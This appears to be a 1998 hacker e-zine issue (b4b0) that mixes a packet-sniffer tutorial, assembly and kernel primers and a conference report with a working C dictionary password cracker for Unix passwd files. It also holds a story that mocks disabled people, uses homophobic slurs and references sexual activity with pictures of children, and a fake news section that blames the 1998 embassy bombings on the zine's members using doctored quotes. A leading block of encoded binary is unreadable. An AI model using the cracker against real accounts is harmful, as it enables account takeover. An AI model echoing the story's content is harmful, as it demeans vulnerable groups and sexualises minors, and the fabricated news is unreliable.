M\]SUI&!9=H/)IN<^E2#ZT@"*$1KQQ4GJ.](6P*CW>]"207N*U+G':HV;--+T MAEI),FI1(,=<51$G/6E\S`_Q-5<31E!G`Z`_C2!FW`X[^IJJ;Z!4W22H$]2> M*9%?6\C,$7=N74\J'&:Y#QQ=VZ6BYE4R@_+E@<^WO0X*6C*C-PU-.WN(Y!D M-4V^2/YERPQ7GEAXA%G=M#*0T>?E8'I[5VFGZO#,H^:N2I3<6=L)*:NC1CO@ M#AN#[U:CNU8<$55D2"=-Q`^M9=U$L#YCG91^=8FB5SIEN1Z@_2H[O4EB4;CU M.!7.6AFE?/VIMN>@&*UTA!`!N,5-O]J9%BQNR.M,D&1G/TJ/?VS@5')+R M.>:3!!*1@`XZUQOCW8=%NPP'W>/KFNHN)@HY(KSCXAZLC(+.-P6<@L!Z"KI* M\D*KI!W,;PC;D^9(0>>!S76QH^\%2?7K7.Z`GEPHJGHO(/K73Z>I/4=/0<4J MKO(Z:4>6"187S!@`'IR:AOIB46%#B24A!_4U;WJ"M&!L+Q4I$2U-)6QTJ16. M:J!_PJ02>AIHS+@<$>M3*^.*H++D\],U*LF/3%,FQ9=^:AD;( X)Y%-+\ M8Q0%A=W`)I5?!Z5"7[$4P28/![4#L7-_K0Q&.OZ54,G/)-*TI)+;STZ4[BL6 M%?:.O-.W\9JH'QGFE,@`H"Q8F"R1LAY##!%(@21G(YZCTI[CB["13XN9M[Z.>,2(?PSR#6A!?$K@X M_P`:.4T9HK*`<9XS5R*<,F"16&\C!MR]#VI8[G;CG'TI6$U4Z)I%E;;UQR:D\SCKTK.@=47`[CDFG^=R>G'K20-%GS3YA&>* MF1_?\:SHY0>>E3K*,]2*I$M%Y9>:H++P0/6GK(,#F@5C0#CV^M.#D M'.>*I"0<8/%.\WIS3$6S)[\5"9?FY-0--@]?QJ`W`R>:`L7Q)GOS4;2X.,U0 M>]5!DD<50EU>!22TJ+]6`II-@;JRC/6AIN&KQ/_JWW\?PG-5+B35; ME\Q&&&,=`06)^N"*I0;$QUI93+\SOLW#)C4Y4'\:<='@#EQ$@/K7J36ASB,_B:KW&E M^<#YH5QZ8H;NK,J#Y7=''6=U,ZGR9EDSV)Q^5326]Y,5\S:BD_WN:M-X8B-S M+-#+)"Q;`12-HQQTJE=0:I:7*I&IN8^Y3C'YUA*F^AUQK)[FOI]FD`!+$\UI M[\``'Z5ST6J>60DH,/5(_P#GHI/)QFL'!W-;W-U9,Y]*G23CG!%< M\=5B4Y#`@T^+686X#C/UIN??68@I.]=W MUJ`:TA("E6)]#0XL%&YU#W$8Y!XJK->QJ,E@/M(T6,NI&33_)\M@V`.W'>I&B41,T*MG'*BL[N139@^(+Y;*SEN&Q]W M"C^\:Y+0;P@,[$%F;))KH]5\-ZEKA"LIAC1L?/Q^.*@@^'NHV[@PW43+WW@_ MTKLA!QJZT>YNQW(P.3C/K3TN0#SU_G60-%U*$#_28'/IR":#;:Q'M M_<+(">JMT_.I=)H7/'N;:3C(YJ43+MZUDV^GZJV-YB1?SD/FCW-&2? M!ZU`;K&03TJG>6MX[(D-PB[B?X3SC'2HIM&"R(\EQ-)\Z_*6X[YZ5:HOJ3[2 M)9N-1CB7]Y(`/K7/:UXAM_L^V-A)N.!M&>:Z:ZT&RE9'>W1AC!&.#3EL(+6- M($AC$&X@`+P*TC22(=5'DMF=9M;EY4LYFBD;.W''X5J#6[FV`>>QG5.Y`XKT MF33(-GRQJ/3`J-M/MW0;HEW$>GYUHXIDJHULSC+3Q!IUV%5;A4D[!N#5[SE' M1NWK6A=^$M,F;=);(>_2IXKH''/ZUQ<$OB%U`.F1J<_Q. M15V.+Q$ZC%M:H3W+,:GV3&Y(ZE;D9/-/2Z`'6N8P'5SFFJ;((+=(E[-(0*0S*.GI5V(YWT*4.D6\('EKLX["I]T-N=K\&G-..1D"E!# M##%6'KBG:PFV]QOI2/115$BM_K#2-]TT44ACAT_&@],]Z**`*15?*)P,[CV] MZRT.;V7/..F>U%%!:&WUO#+$6DAC]0.3OQGC%%%,0D7+/]*2+KGW-%%,: M'2?ZG/?-10@%8\_W(!C^^O\Z**$3U)F^Z/I4<@'/'\-%%,8Q/\` M4#_=%+'S)(#R./Y444`1C_EK_O?TI3PPQWZT44P)6X/%1W*(]M(K*K#!X(S1 M10!ST[M_9MM+N;S`V`^>1^-;EO\`ZZ,=F7D>M%%-@RQ<`;2<#-!X5,P[;CQ4J<`_2BBF(ECY4$\G%.'7\***0!)PK$=?6HG_`(O\]J**2$02 introduction. | Packet sniffers allow users to examine every packet that goes through their ethernet. If you have a PPP connection, you will be able to intercept all data passing through your machine with a packet sniffer. Running a packet sniffer is a useful tool for debugging your network code, or figuring out a foreign TCP/IP encapsulated packet format. The concepts behind writing a linux packet sniffer are pathetically simple: any intermediate C programmer will have no problem understanding them. In this article we build a simple linux sniffer from the ground up, leaving much room for improvement. ***************************** 0x1> socket(), SOCK_PACKET. | ***************************** To open a socket in any POSIX compatible OS, we call the socket() routine. Socket() creates an endpoint for communication between the kernel and a user process, using the standard file I/O syscalls read() and write() as mechanisms for data transfer. The prototype for socket() looks like: int socket(int domain, int type, int protocol); For internet sockets, the domain is always AF_INET. The type varies. For a TCP socket, you'd use SOCK_STREAM, for UDP, SOCK_DATAGRAM, and for datalink access (the kind we're interested in) you'd use SOCK_PACKET. socket() returns a file descriptor that we will use to read from the datalink. Here is an example program that opens a socket to the datalink, and exits: #include /* for SOCK_PACKET define. */ #include /* for ETH_IP_ALL define. */ main() { int fd; fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP)); /* the constant ETH_P_IP tells the kernel to pass our socket only IP datagrams. Just take my word for it. */ } ***************************************************** <0x2 : Reading from the datalink. iphdr{}, tcphdr{}. ***************************************************** Okay, great, we've opened a socket to the datalink. But its no use to us unless we actually read from it! This is best explained in an example: struct packet { struct iphdr ipheader; /* IP header :duh: */ struct tcphdr tcpheader; /* TCP header */ char data[2048]; /* the data! */ }sniffdpacket; bzero(&sniffpacket, sizeof(struct packet)); /* fill out packet structure with zeros so we dont get some random data in there. */ fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP)); /* same deal as b4. */ read(fd, &sniffpacket, 2088); /* this is where it all happens.. */ /* as you can see from the function below, all the fields in the structure * we just read() are properly aligned with the actual IP/TCP headers. * So, we can just evaluate data like this!! */ printf("Packet snatched from %s, going to %s, source port %d, dst port %d.\n", inet_ntoa(sniffpacket.ipheader.saddr), inet_ntoa(sniffpacket.ipheader.daddr), sniffpacket.tcpheader.source, sniffpacket.tcpheader.dest); /************/ In the above code fragment, we opened a datalink socket, read from it, and reported data about the packet. Please make sure you understand these concepts before moving on to the next section. If you didn't know, inet_ntoa() converts a network IP address to a dotted-decimal ASCII IP address. ***************************************************************** 0x4> Putting it all together. Building a small packet sniffer. | ***************************************************************** A minimal packet sniffer should interpret the information read off the datalink so that it is well organized and easily accessible, and report important information back to the user. As shown above, we can organize the data by declaring struct packet { struct iphdr ipheader; struct tcphdr tcpheader; }. Because C arranges the elements of structures in the memory in the order in which you declare them, the fields in a real world IP datagram read from the datalink will be inserted into the appropriate variables in our structure when we read() into it. Here is the packet sniffer: /////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////// #include /* for AF_INET and SOCK_PACKET. */ #include /* for ETH_IP_ALL. */ #include /* for struct iphdr{} */ #include /* for struct tcphdr{} */ main() { /* I certainly hope you know TCP/IP; but if you don't, an IP header contains routing information for an internet packet, and a TCP header contains connection oriented information. The IP header "encapsulates" the tcp header. We use this structure so that data we read() from the datalink will be easily accessible to us. */ int fd; /* to hold our sockets file descriptor. */ struct packet { struct iphdr ipheader; struct tcphdr tcpheader; char data[2048]; }sniffpacket; bzero(&sniffpacket, sizeof(struct packet)); /* fill out packet structure with zeros so we dont get some random data in there. */ fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP)); /* same deal as b4. */ while(1) { read(fd, &sniffpacket, 2088); printf("Packet snatched from %s, going to %s, source port %d, dst port %d.\n", inet_ntoa(sniffpacket.ipheader.saddr), inet_ntoa(sniffpacket.ipheader.daddr), sniffpacket.tcpheader.source, sniffpacket.tcpheader.dest); printf("Here is the data we intercepted:"); puts(sniffpacket.data); } // repeat, FOREVER. :) } ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// have fun! - v0id -[9 - b4b0 tak3z g0ld at the spec1al 0lympikz - ky00 ]- x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x === my acc0unt of the 1998 summer special-0lympiq games. === 0kay so itz waz a hot summer day. t34m b4b0 haz been getting ready for the 0lympicz for years now. f1nnally their chance t0 make it b1g had c0me. yearz and yearz of practice and experience h4ve f1nnally p4yed 0ff; for these were n0t just any 0lympiqz. these were the special 0lympiqz. the g1mp gamez have b3gun! b4b0's main g0al iz to set a n3w standard f0r the special 0lympiqs competition. n0 more gimpz. they are going to trample up0n those l1mping one eyed crooked feet k1dz. and m4ke them l00k l1ke the pathetic human waste that they are. 0kay so the first event iz the joust. j0ust had recently been added to the l1st of eventz f0r the special olymp1qz. the f1rst tw0 who get to g0 at it iz b4b0'z very 0wn editor ge0rge. ge0rge waz nervous ab0ut the event, but he haz sk1llz in j0usting. wh0ever his opponant iz, i knew that ge0rge would trample up0n h1m. ge0rge, the 6'1" 480 lb m4nw0man stepz 0nto hiz h0rse. l1ttle does he kn0w hiz opponent would be 0ne of the m0st elite people to ever w4lk the planet. yes. i kn0w what y0u are th1nk1ng. and y0u are r1ght. it iz so1o. so1o the meek yet p0werful ch1ld w1ll meet h1z match t0day. so1o getz on his horse and grabz his p0le. ready s3t g0! they are 0ff. ge0rge iz going full speed at so1o with hiz p0le aimed right at h1z head. l1ttle duz so1o kn0w that bef0re the m4tch, ge0rge 0wned so1o'z p0le with some 0day phf tekn1q. 4ll the sudden so1o fell 0ff h1z horse and the m4tch was ge0rgez. c0ngratulationz ge0rge you w1n the g0ld metal. so1o, dripp1ng with sweat g0t off of h1z h0rse and screamed that l0ckdown.sh w0uld own them all. but he waz 0nly laughed at by ge0rge'z fans. f0r they knew he had no sk1ll. b4b0: 1 - g1mpz: 0 the n3xt event iz the j4ck1ng 0ff c0ntest. the j4ck1ng off c0ntest cons1sts of only 1 rule: n0 h3lp. the f1rst 0ne to sh00t his cum 1nt0 JP'z m0uth (h3 iz tied up to a p0le) iz the w1nner. the tw0 lucky pe0ple compet1ng against each 0ther are seegn4l and 0verdose. 0verdose iz very sk1lled at thiz, it c0uld be a h4rd m4tch f0r seegn4l. but we w1ll never kn0w until itz 0ver. 4nd they're 0ff!. 0verdose surr0unded by p1cturez of 12 year 0ld girlz and b0yz iz sp4nking it super f4st. th1z b0y must be fr0m the west s1de. my l0rd i have never seen any0ne j4ck off that f4st. 0h dear! before seegn4l even haz his pantz off 0verdose is squirting JP all 0ver - th1s w4z timed at 1.84 sekondz.. g00d l0rd th4tz a sh0rt t1me. JP getz up, wh1le covered in s3m3n and then proceeds to scream to the cr0wd "I AM NOT A HACKER. I AM JUST SOMEONE WHO LIKES IT IF YOU THINK I AM. AND I CAN SHOOT MY LOAD IN 1.184 SECONDS SO FEAR." ..and that is exactly what b4b0 is doing now. ..for the games were tied. oh no!. the final event is to start soon. b4b0: 1 - g1mpz: 1 the f1nal and deciding event 1z n0w about to beg1n. th1s c0uld crush b4b0'z dreamz if they c4nt w1n it. the cr0wd iz crazy and screaming with restlessness. g0 b4b0 g0 b4b0!. th3 f1nal ev3nt iz the 400 meter d4sh. th1s inv0lves 4 players fr0m each team. and they pass thiz little p1pe al0ng, to the next person (they 4ll have l1ke. precoordinated spotz on the traq.. you know h0w it goes i'm sure. if not yer dumb.) 0kay so the pers0n starting the r4ce for b4b0 iz r4lph. the pers0n racing for the g1mpz is JP. b4b0 iz wearing a t1ght red m0nkey outfit ..(h0w s1lly). JP iz wearing an official antionline t-shirt. (this man iz a homosexual). the runnerz are set in their start p0siti0nz. ready s3t g0. JP beginz to limp slowly around the tr4ck. the drool falling d0wn hiz chin. what a pathetic m4n. r4lph playfully walkz behind JP. 0h my g0d whatz this! ralph iz spitting on JP. all 0ver. man. he probably doesnt m1nd with all the s3m3n he's covered 1n. but thatz okay. ralph looks to be getting bored..oh! ralph just knocked JP onto the ground and took his shorts. and drew a m0nkey on his antionline t-shirt (i w0nder wh4t kind 0f m4n would draw a m0nkey on a drooling gimpz shirt.) ralph got t0 the next pers0n and handed off the p0le to him. it waz tip. tip waz a fast runn3r. he g0t b4b0 a nice lead in the r4ce while JP cr4wled to his teamate, so1o. so1o and his wheelchair took off like a flash. when so1o getz busy, this vain pops out of the s1de of hiz head. it makes him l00k silly. s0 anyway. tEEp is 0nly a few yards ahead at this p0int and he is still g0ing at a steady p4ce. 0nly one more person t0 h4nd off to. ky00 w4z waiting on the tr4ck t0 get the p0le. as tip came running up to him, he s4w s01o and his wheelchair flying t0wards him, as s00n as he got the pole, he put it int0 so1o's spokes on hiz wheelchair, sending him face first 1nt0 the big pool 0f urine and feces. w3 all kn0w what THAT means. 0kay so ky00 iz now running down the track l1ke a b4t 0ut of h3ll. beh1nd him iz a big b4d overd0se. n0w. we all kn0w 0verdose has no skillz, n0 common sense, and n0 friends. s0 qytp0 was g0ing to exploit th4t. as 0verdose was running, ky00 stopped him, n0 one could hear what Qytpo was saying to h1m. 0h my g0d!. whats thiz!? 0verdose iz n0w pulling down his pants. and ky00 iz greeting that with a grin. 0h my. in the 28 years of special olympics i have never seen 4nyth1ng l1ke this. 0h l0rd! n0t only iz he pull1ng d0wn h1z pants. but he iz bend1ng over w1th hiz ass pointed straight at ky0o. Qytpo must have seen this as a great opportunity. (n0t to run to the finish l1ne silly. but t0 fuq overdose up the 4ss.) l1ttle did 0verdose know, how r0ugh ky00 really waz. (el4psed t1me..a f3w h0urz perhaps..) 0verd0se iz l4ying 0n the gr0und in p41n n0w. and ky0o iz str0ll1ng t0 the f1n1sh l1ne. h0ray. b4b0 w1ns. the g1mpz might h4ve h4d a chance, if 0nly 0verdose wasnt quite the h0m0sexual that he waz. oh well. itz okay to be g4y. really. AND THAT IZ B4BO TEKNIQUE VAYVEE -[10 - b4b0-cr4q.c - seegn4l]- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x /* * by: seegn4l * b4b0-craq.2 */ #include #include #include #include #include #include #include #include #include #define MAXSIZ 50 #define DEFLOG "craq.out" void banner (void); void sigcatch (int); void usage (char *); void crack (char *, char *, char *); void main (int argc, char *argv[]) { char logfile[30]; banner (); if (argc < 3) usage (argv[0]); if (!argv[3]) strncpy (logfile, DEFLOG, sizeof (logfile)); else strncpy (logfile, argv[3], sizeof (logfile)); crack (argv[1], argv[2], logfile); } void banner (void) { fprintf (stdout, "\nb4b0-cr4q.. by: seegn4l, '97.\n\n"); } void sigcatch (int sig) { fprintf (stdout, "\n[!] caught signal: %d\n", sig); exit (0); } void usage (char *name) { fprintf (stderr, "us4ge: %s [0utputF]\n" "\tpasswdf -> password file.\n" "\tdictf -> dictionary file\n" "\toutputf -> output of cracking session.\n\n", name); exit (1); } void crack (char *passwd, char *dict, char *out) { FILE *pw, *dt, *lg, *pipe; struct passwd *p; char date[20], pwbuf[MAXSIZ], *strip, *try; signal (SIGINT, sigcatch); signal (SIGTERM, sigcatch); if ((pw = fopen (passwd, "r")) == NULL) { perror ("fopen"); exit (1); } if ((dt = fopen (dict, "r")) == NULL) { perror ("fopen"); exit (1); } if ((lg = fopen (out, "a+")) == NULL) { perror ("fopen"); exit (1); } if ((pipe = popen ("date", "r")) == NULL) { perror ("popen"); exit (1); } fgets (date, 20, pipe); pclose (pipe); fprintf (stdout, "[\\] logfile: %s\n[/] passwd: %s\n[\\] dictfile: %s\n\n", out, passwd, dict); fprintf (lg, "[\\] b4b0-craq v.121 ...\n"); fprintf (lg, "[/] Passwd file: %s\n[\\] Date: %s\n\n", passwd, date); for (;;) { memset (pwbuf, 0, sizeof (pwbuf)); rewind (dt); if ((p = fgetpwent (pw)) == NULL) { fprintf (stderr, "*** No more entries in the passwd file.\n\n"); break; } if (!strcmp (p->pw_passwd, "*") || (!strcmp (p->pw_passwd, "!"))) { fprintf (lg, "[o] Account: %s is disabled.\n", p->pw_name); continue; } fprintf (stdout, "[o] cracking %s's password.\n", p->pw_name); /* ugly (hey it works) continue/breaks have no effects in goto loops */ craq: if (!fgets (pwbuf, MAXSIZ, dt)) continue; if (strip = strchr (pwbuf, '\n')) *strip = '\0'; try = crypt (pwbuf, p->pw_passwd); #ifdef DEBUG fprintf (stdout, "DEBUG: dict file word: %s\n", pwbuf); fprintf (stdout, "DEBUG: encrypted dict file word: %s\n", try); #endif if (!strcmp (try, p->pw_passwd)) { fprintf (stdout, "\a\a[!] WE GOT ONE.\n"); fprintf (lg, "[!] user: %s password: %s\n", p->pw_name, pwbuf); continue; } goto craq; } fclose (dt); fclose (pw); fclose (lg); exit (0); } -[11 - ASM part I - f1ex ]- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x ASM - Part 1 ------------ A lot of people has been asking me what is ASM and how does the language differ from other programming language.Well this is an article to give you a basic knowledge of ASM is all about. ASM is stands for assembly as in a low-level programming language and compared to C and the rest this is in counted as a 2nd Generation Programming Language where else the 1st Generation Programming Language is "Machine CODE". Let's talk about the registers. General Purpose Registers ------------------------- - AX as accumulator register - BX as base register - CX as count register - DX as data register The above are just the primary functions of these registers.They can be used in any fashion at the programmer's disposal,i.e. BX can be used as data register if needed to. These 16-bit registers can still be reference as high and low nibble of 8-bit each. |------16-bit AX------| _____________________ | 8-bit AH | 8-bit AL | --------------------- Segment Registers ----------------- Intel 8086 keeps data and code in memory using different segments up to 64K in size - CS as code segment register - DS as data segment register - ES as extra segment register - SS as stack segment register To access to a particular memory address, the segment-offset pair is used,i.e. A284:05F2, where segment is A284 and offset 05F2. Index Registers ---------------- - SI as source index register - DI as destination index register These are used generally for string operations with association with the DS and ES register. Pointer Registers ------------------ - SP as stack pointer - BP as base pointer - IP as instruction pointer The SP is used with association with SS; BP is used to facilitate referencing parameters passed via the stack; and IP keeps track of the location of current instruction. Flag Register ------------- In this case only 9 out of 16-bit reguster are used. - OF (overflow) bit set if overflow - DF (direction) bit clear for normal lower-to-upper direction and upper-to-lower if set - IF (interrupt) bit disable interrupts when clear - TF (trap) bit set to tell processor to execute in single-step trace mode. Used only in debugger - SF (sign) bit clear when positive and set when negative - ZF (zero) bit set when results of arithmetic operation or comparison is zero - AF (auxiliary carry) bit set if arithmetic causes a carry out of bit3. Use in ASCII and BSD packed fields only - PF (parity) bit an odd parity bit that is not commonly in use - CF (carry) bit result of carry in arithmetic operation This an example of the flag register:- 15 14 13 15 11 10 09 08 07 06 05 04 03 02 01 00 OF DF IF TF SF ZF AF PF CF Coming up next on b4b0 issue3 is ASM PArt2 (Assembly Instructions) -[12 - b4b0 N3WZ - newz newz Gn00Z! ]- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x News Thursday, August 20, 1998 ______________________________________________________________________ The group "b4b0" suspected in Nairobi bombing By NATION Reporter and Agencies Yesterday, three members of the electronic magazine (b4b0) staff were arrested by United States Federal Marshalls on the suspicion that these self-proclaimed "wankers of the electronic frontier" were responsible for the bombing of the US Embassy in Kenya. One of the men, a "ge0rge" as he calls himself, was imprisoned for resisting arrest. He commented later that, he had no donuts, dynamite, or coffee and that he was being unjustly treated because he was an orthodox jew. These allogations were denied by the US Marshalls. Another One of the men - it was not stated which - was said by Pakistani officials to be "a pivotal participant" in the bombing which killed 247 people and left more than 5,000 injured. We don't know his exact name but b4b0 refers to him as "r4lph." A near-simultaneous car bomb attack outside the US embassy in Tanzania killed 10 people. b4b0 was also suspected there. One of the suspects had been identified by Mohammed Saddiq Howaida, ("phFh4Ck3r" known by b4b0) the suspect arrested in Pakistan on the day of the bombings, August 7, and flown blindfolded back to Nairobi. A statement issued by the FBI and Nairobi CID read: "The FBI and CID confirm that searches were conducted at the Hill Top in Nairobi on Tuesday. "The investigation is proceeding in a logical manner and no further comment will be made at this time." After his arrest, pHfh4ck3r, 12, a Palestinian from Jordan, described the terrorist network he allegedly works for to Pakistani officials, according to the authoritative Washington Post newspaper. phfh4ck3r said the bombing was sponsored by Saudi millionaire "tEEp" whose group consisted of 4,000 to 5,000 heavily armed terrorists who operated full-time in Saudi Arabia, Sudan, Egypt, Yemen, Ethiopia and Somalia, as well as in Pakistan and Afghanistan, the paper said. phfh4ck3r told the Pakistani officials that tEEp had a large arsenal of surface-to-air missiles, mortars, vibrators, sheep-skin condems, islamic women, rabbis, rockets and tanks, stored all over Afghanistan because they threatened his dog "Fluffems." He also said that tEEp's operatives in the past were sent to carry out armed actions abroad, including the 1993 hit-and-run attacks on US forces in Somalia, which he called the terrorist network's "biggest victory". Kenyan and US investigators said earlier that phFh4ck3r had not admitted any responsibility to them in the Nairobi bombing or in the almost simultaneous one at the US embassy in Dar es Salaam. The Washington Post reported that phFh4ck3r told the Pakistanis he was an engineer who had been sent to Kenya to provide technical and logistical support for the bombing, but that he had been instructed to leave Kenya hours before the blast. He, however, denied this to the Kenyans and the FBI because he knew that any admission of a crucial part in the bombing would bring a death sentence, sources said. The US government has demanded tEEp's extradition from Afghanistan, warning the Taliban government that it can expect no international recognition until it hands him over. The Taliban rejected the request, according to reports in Islamabad, the Pakistan capital. "We will never hand tEEp over to anyone and protect him with our blood at all cost," the b4b0 (b4b0!) quoted Taliban editor-in-chief ge0rge as saying. ge0rge added: "The US intelligence and investigation agencies find it convenient to blame tEEp to cover up their own failures." ***** 'America Will Not Retreat': Excerpts From Tributes Federal Document Clearinghouse Friday, August 14, 1998; Page A30 President Clinton: There may be more hard road ahead, for b4b0 target America because we act and stand for peace and democracy, because the spirit of our country is the very spirit of freedom. It is the burden of our history and the bright hope of the world's future. We must honor the memory of those we mourn today by pressing the cause of freedom and justice for which they lived. We must continue to stand strong for freedom on every continent. America will not retreat from the world and all its promises nor shrink from our responsibility to stand against b4b0(tm) and with the friends of freedom everywhere. We owe it to those we honor today. As it is written, their righteous deeds have not been forgotten. Their glory will not be blotted out. Their bodies were buried in peace, but their names shall live forever. Secretary of State Madeleine K. Albright: Terror can turn life to death, laughter to tears and shared hopes to sorrowful memory. It can turn a building to rubble, but it cannot change America's determination to lead or to strive with others to build a world where there is more hope and prosperity, freedom, peace, and no b4b0. Make no mistake, terror is the tool of b4b0. It is not a form of political expression, and certainly not a manifestation of religious faith. It is murder, plain and simple. And those who perpetrate it, finance it or otherwise support it must be opposed by all decent people. Rest assured, America will continue to be present around the world wherever we have interests to defend, friends to support, and work to do. America will not be intimidated by b4b0. We will maintain our commitments to the people of Africa. We will do all we can to protect our diplomatic and military peoples around the world. © Copyright 1998 The Washington Post Company U.S. OFFERS UP TO 4 MILLION DOLLARS FOR INFORMATION ABOUT "b4b0" The U.S. Department of State offers substantial rewards for information preventing acts of international terrorism against United States persons or property done by b4b0. The reward level is up to $4 million when U.S. civil aviation is targeted by b4b0. The Counter-b4b0 Rewards Program was established by the 1984 Act to Combat b4b0z elite reign, Public Law 98-533. Under the Rewards Program, cooperating individuals ("narqz") and their immediate family members may be relocated to the U.S., or elsewhere, and they are assured complete confidentiality. Rewards, totaling millions of dollars, have been paid in dozens of cases. Innocent lives have been saved and b4b0-wannabez put behind bars because they got kaught. In 1994, Congress expanded the definition of "international terrorism", authorizing rewards for information regarding "...any act substantially contributing to b4b0s acquisition of unsafeguarded special nuclear material or any nuclear explosive device. -[13 - SecCon '98 - ph1sh (not b4b0 product)]- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- ------[ Seccon '98 ]----- After a long period of waiting time and organisation, it's happened. Australia's first hack con took place at the ANA Hotel, Sydney. I took the one hour flight down to Sydney on the morning of the con, something I came to regret due to my late night the night before. I arrived in Sydney and caught a cab to the ANA, where I was due to speak in about 15 minutes. I was fairly late, and some fed was talking about hacking and the law when I arrived. I scanned the audience and found that the con in itself was more formal than perhaps I had hoped. Without much further ado, the fed con cluded his speech and I was thrown into the limelight. I covered the basics of NT security and common attack methods, just old regurgitated stuff basically. After I gave my talk, I then met up with a good friend from irc, duke. We had arranged to meet before my talk but due to both of our late arrivals we had to wait till after my blurb. I was foll owed by some Microsoft security dood who rambled on for the next half an hour over nothing important. Duke and I were basically talking out in the forum during morning tea, and we were getting heaps of kudos and business cards and stuff which was pretty neat. We actually got some pretty coo l job offers too, with really good pay, but that doesn't matter. The conference then resumed with talks on virii and anti-v irii techniques, but I found that quite boring since virii doesn't interest me in the slightest. I had hoped to play ar ound on the network while the boring speeches were on, but the isdn modems weren't working. :/ Duke and I had to leave the first day early because he had a guitar lesson and I was staying with him. We got back to his house and I sat on irc while he got schooled in guitar techniques :> So then duke came home and we both sat on irc, heh. Duke then coded an updated version of his qpop scanner and released it to rootshell, I dont think it got posted :/. So after a night of coding and breaking stuff, duke and I woke up early to venture to what prospered as a more invigorating day than the first had been with the network up and Julian Assange (proff) giving a talk on deniable cryptography. So the geek fest (I got that off sewid) proceeded on and more cra p was spoken. A bunch of guys took part in some kind of wargame where they had to break past a firewall or something but e nded up taking down their own router with a DoS attack. Anyway that's my short and sharp account of Seccon98 for what it's worth. Their site is at www.seccon.org -------[ EOF ph1sh -[13 - what it sayz bel0w - aqua ]- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! .x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x A *BRIEF* Intro to the Linux Kernel - aqua - This article will not provide you with specific details about the Linux kernel. Its purpose is to depart some general ideas about the kernel and show you how to obtain more detailed information on select topics. Hopefully, you'll finish reading this article and know a bit more about how your operating system works. - Multitasking - Definitions: process - a program that is executing. kernel stack - every process has a kernel stack. It's purpose is to provide space for kernel operations on a process. It is transparent (invisible from the programmers perspective), and only visible by the kernel. One of the most important properties of the linux kernel is its ability to run multiple programs simultaneously. It does this by "time slicing", or only executing a process for a fraction of a second, then moving onto another process, then another, in an infinite loop until the computer is turned off. The CPU is responsible for generating an interrupt every 10ms that tells the kernel to start dealing with a different process. 1ms...................30ms [ ls ] [ find ] [ BitchX ] (the kernel executes each of these programs for only 10ms before moving onto the next.) Switching a process into context" means arranging the kernel stack and registers so that the process can begin to be operated on by the CPU. "Switching a process out of context" means arranging a process and it's kernel stack so that the CPU can begin operating on the next process in queue. When a process is switched out of context, it's registers, among other things, are backed up on the kernel stack so that they don't get clobbered by subsequent processes. When the process is switched back in, the registers are popped out of the kernel stack and operation begins again. In the linux kernel, a process is defined by struct task_struct. Read this structure for further information. *[* System Calls *]* Definitions - The kernels only purpose in life is to provide services to programs running on the computer. From the programmers perspective, the kernels services can be accessed via system calls such as fork(), write(), read(), and execve() to name a few. System calls are called as normal libc routines, because they are "wrapped" by libc. A syscall is expanded by libc via the macros _syscall1, _syscall2, _syscall3, etc, where the number is the number of arguments to the system call. _syscallX macros take the arguments to the function, push them into their appropriate registers, and call int $0x80, initiating a software interrupt to jump into kernel mode. *[* Paging, memory management, etc. *]* In the linux, a user processes memory, as viewed from a C program, spans from zero to X. Obviously, address 0 in a user process is not the first address in physical memory... So the process is sorta operating on a "virtual machine." (it thinks it's the only process on the machine.) A process operates on "virtual memory", but so does the kernel, at its higher layers, anyways. The virtual memory subsystem allows memory to be addressed consequetively, without holes or gaps. For example : Physical memory [1 - 4000 [ hole ] 5000 - 10026 ] Virtual memory [1 - 10026 ] So as you can see, addressing virtual memory is much more convenient, because we aren't restrained by the physical limitations of memory. Indeed, we could address HIGHER than physical memory allows us to, and the virtual memory subsystem would swap pages to the hard disk to allocate more memory.. And this would all be transparent above the virtual memory subsystem. Most of the kernel, besides the actual memory management subsystem, addresses virtual memory. "Page stealing" involves moving pages to hard disk once physical memory is exhausted. Pages on hard disk can't be operated on by the CPU (duh) so they need to be swapped BACK into memory when a process tries to access them. Having said this, it should be obvious that we'd like to swap pages to disk that won't be accessed in the near future. The algorithm used to guess what pages are accessed infrequently is quite simple... When a page is accessed, the "dirty bit" is set, and when time comes to swap a page to disk, a page that doesn't have the dirty bit set is swapped ( it's assumed this page won't be accessed soon ). Every once an awhile the paging subsystem goes around and clears the dirty bit off of every page. OK, that's it!@&$!@$ if you found this interesting, please read a book on kernel internals... Or read some of the linux kernel src@&$^!@*& BYE -[14 - the end of b4b0[ii] 